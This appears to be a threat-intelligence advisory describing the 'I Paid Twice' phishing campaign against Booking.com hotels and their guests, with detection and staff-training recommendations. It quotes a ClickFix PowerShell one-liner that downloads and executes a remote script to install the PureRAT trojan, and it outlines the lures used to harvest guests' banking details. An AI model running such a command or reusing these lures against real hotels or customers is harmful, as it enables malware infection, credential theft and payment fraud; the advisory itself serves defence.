Sophisticated Phishing Campaign Targets Booking.com Hotels and Guests

Published Date: November 11, 2025

Category: ShadowOpsIntel

This campaign targets hotel partners and guests using compromised Booking[.]com accounts. Threat actors launch phishing and malware campaigns through malicious emails and WhatsApp messages disguised with legitimate reservation information, increasing credibility. The end goal is to steal credentials, deploy malware (PureRAT), and commit financial fraud.

Severity: High

Threat Details

Phase 1: Initial Compromise of Hotel Systems

Step	Description	Mechanism
Initial Lure	Attack begins with a malicious email sent to a hotel’s reservation or administration address, often from another compromised legit corporate account. The email impersonates Booking.com and refers to a customer request, such as a “New last-minute booking”.	Spear-phishing.
Redirection Chain	The email contains a URL (e.g., hxxps://{randomname}[.]com/[a-z0-9]{4}) that uses a Traffic Distribution System (TDS) for redirection, concealing the final malicious infrastructure.	TDS infrastructure.
ClickFix Tactic	The victim is directed to a page impersonating the Booking[.]com extranet/admin interface, which features a fake reCAPTCHA challenge. This is the ClickFix social engineering tactic.	Social Engineering.
Malware Execution	The victim is prompted to copy and execute a disguised PowerShell command (e.g., powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command “lex ((New-Object Net.WebClient).Do wnloadString(‘…’))”).	PowerShell abuse.
Final Payload	The command downloads & executes a script that installs PureRAT, typically using DLL side-loading & persistence mechanisms (Runkeys, Startup folder shortcuts). The core goal is to steal credentials giving access to guest data.	PureRAT (Remote Access Trojan).

Phase 2: Fraud Targeting Customers

Aspect	Details
Fraudulent Contact	Customers are contacted directly via WhatsApp or email. The messages contain legitimate reservation details (personal identifiers and dates) from the stolen hotel data, significantly increasing credibility.
Phishing Lure	The message falsely claims a security issue with the customer’s banking details during verification and urges them to “confirm their information” to prevent reservation cancellation, citing a fake “Booking new policy”.
Phishing Page	The victim is directed to a URL (e.g., https[:]//guestverifiy5313-booking[.]com/6712 2859). The page is protected by Cloudflare Turnstile but mimics the Booking[.]com layout to harvest banking information.
Outcome	The customer is defrauded, effectively paying for the reservation a second time – the source of the campaign’s name, “I Paid Twice”.

Recommendations

Train staff to recognize spear-phishing attempts that impersonate customer inquiries or official Booking[.]com messages.
Specifically warn against clicking links or, most critically, copying and executing commands disguised as security checks (like the ClickFix reCAPTCHA tactic).
Emphasize that legitimate platforms like Booking[.]com will never ask an administrator to execute a PowerShell script to view a reservation or a message.
Mandate MFA for all professional accounts accessing booking platforms (Booking[.]com, Expedia, Airbnb, etc.)
Treat any message (email or WhatsApp) claiming a payment issue with extreme caution, even if it contains legitimate reservation details.
Never click a link in an unexpected message to “verify” or “update” banking information.
Monitor for PowerShell scripts that download content from external URLs, particularly those using Invoke-WebRequest or Invoke-Expression.
Monitor for TCP/TLS outbound connections on uncommon ports (56001–56003), used by PureRAT for encrypted C2 communications, and correlate with new process executions.
Monitor for unusual creation of persistence mechanisms (Run registry keys and .lnk files in the Startup folder).
Monitor for anomalous process execution chains, such as AddInProcess32.exe being launched by an executable in the AppData directory or initiating unexpected network connections.
Block the IOCs at their respective controls
https://www.virustotal.com/gui/collection/254adcf653d8f660740d1c40f264085a4f2b106e13d762ccb5a14e1c6737fbd6/iocs

Source:

https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.